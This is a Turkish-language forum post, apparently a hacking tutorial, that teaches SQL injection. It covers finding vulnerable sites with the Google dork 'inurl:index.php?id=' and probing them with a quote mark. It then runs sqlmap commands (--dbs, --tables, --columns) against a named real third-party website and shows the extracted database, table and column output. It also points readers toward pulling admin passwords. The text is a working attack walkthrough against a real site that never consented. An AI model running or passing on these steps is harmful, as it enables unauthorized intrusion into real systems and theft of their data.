Amacım kesinlikle prim değildir. sizde bu işten zevk alın istiyorum en azından ülkede 10 kişiden 3 ü sql açığını bilceğine bu sayı 10 kişiden 4 çıksın en azından bilgili olun birde heykır hikayelerinde daha rahat bir şekilde anlarsınız.

Selamun aleykum güzel kardeşlerim. illaki bir site heyk v.s ile ilgisi olan vardır ben sizlere bildiğimin az bi kısmını günlük olarak anlatıcağım HTML5 Derslerine kısa süreliğine ara veriyorum daha sorna resimli ve videolu anlatım gelecek.

Gerekli dosya(lar)
SQLMAP
https://www.youtube.com/watch?v=CzyBtuQ9aCo
Buradan kurulumuna bakabilirsiniz yapamazsanız bende yardımcı olabilirim.

başlamadan önce öğreniceğimiz basit şeyler var
Dork nedir
Dork sql açıklı siteleri bulmamıza yarayan koddur. genelde google amcada arama yaparız ( yandex v.s dede arayabilirsiniz)
SQL açığı neden oluşur:
Bu hata genelde kodlama hatası olarak geçer veritabanı ile alaklı kodlama herhangi ufak hata veya gözden kaçmış bir kod yüzünden veritabanındaki bütün şeyleri çekebilirsiniz.

Evet başlıyalım.

ilk öncelikle Dork'umuzu google da aratalım.

ben kendi priv dorklarımı kullanıyorum yani özel sizler basit olarak
"inurl:index.php?id=" dorkunu kullanabilirsiniz.
size manuel bir şekilde öğreticeğim sadece veritabanını programla çekicez yarında sizlere komple bütün seti vericem.

google amcamıza bunu yazınca karşımıza siteler çıkıyor.
Ben ilk baştakini seçtim.



Siteye girdik. ve herhangi bir şey yok.




Sonra url bölümüne tıklıyoruz.




ve sonra sonuna tırnak işareti koyuyoruz ( harfte koyabilirsiniz ama tırnağı tercih ederim.)




ve sonra enter'a basıyoruz ve karşımıza böyle birşey geliyor.




Buradan anlıyoruzki sitede SQL açığı var.
şimdi gerekli programı açıyoruz ( yukardaki linkten Kurmuş olduğunuz )

Sqlmap ile attığımız yere gidiyoruz benimki desktop'ta
sizinkide öyle düşünerek basit olarak cmd'ye
cd desktop
cd sqlmap
sqlmap.py -u http://www.icdcprague.org/index.php?id=10 --dbs

yazıp enter'a basın ve açıktan sızmaya çalışır.




gelen sorulara Y Y diyip geçiyoruz




ve sonra bakıyoruzzzz.
Süpriz veritabanları çekmiş.




ama burada 2 adet veritabanı var hangisi çekicez ? evet genelde sql açıklı olan sitelerin %99'unda "information_schema" olur bu PHPMYADMIN'in kendi kodlarıdır önemli birşey yoktur.
Bize lazım olan 'icdcprague' olan veritabanı. şimdi bu Tabloları çekelim bakalım.

Tabloları çekmek için kodumuz:
sqlmap.py -u http://www.icdcprague.org/index.php?id=10 icdcprague --tables

evet bunu yazıp enter'a basıyoruz




ve gördüğünüz gibi 2 veritabanınıda çekti dediğim gibi "information_schema" yı kullanmıyacağız.




ve tabloları çektik.
şimdi kolonları çekelim.
Hangi kolonu çekmeyi istiyoruz ?
burada admin paneli veya bilgileri olmadığı için ben
"tree" tablosundaki kolonları çekiceğim.
Onun içinde kodumuz:
sqlmap.py -u http://www.icdcprague.org/index.php?id=10 icdcprague -T tree --columns



şimdi karşımıza

+---+---+
| Column | Type |
+---+---+
| id_page | int(11) |
| parent | int(11) |
+---+---+
Böyle bir ekran çıktı bunlarda kolonlarımız
mesela biz burada admin olsaydı orada

+---+---+
| Column | Type |
+---+---+
| admin | int(11) |
| admin 2| int(11) |
+---+---+
olarak çıkıcaktı peki şifreler ?
onuda oradaki password bölümünden çekicektir

Okuduğunuz için teşekkürler herhangi bir sorunda PM atmanız yeterlidir 30 dakikalık çiş molasına çıkıp geri geliceğim ve sorularınızı yanıtlamaya çalışcam umarım işinize yarar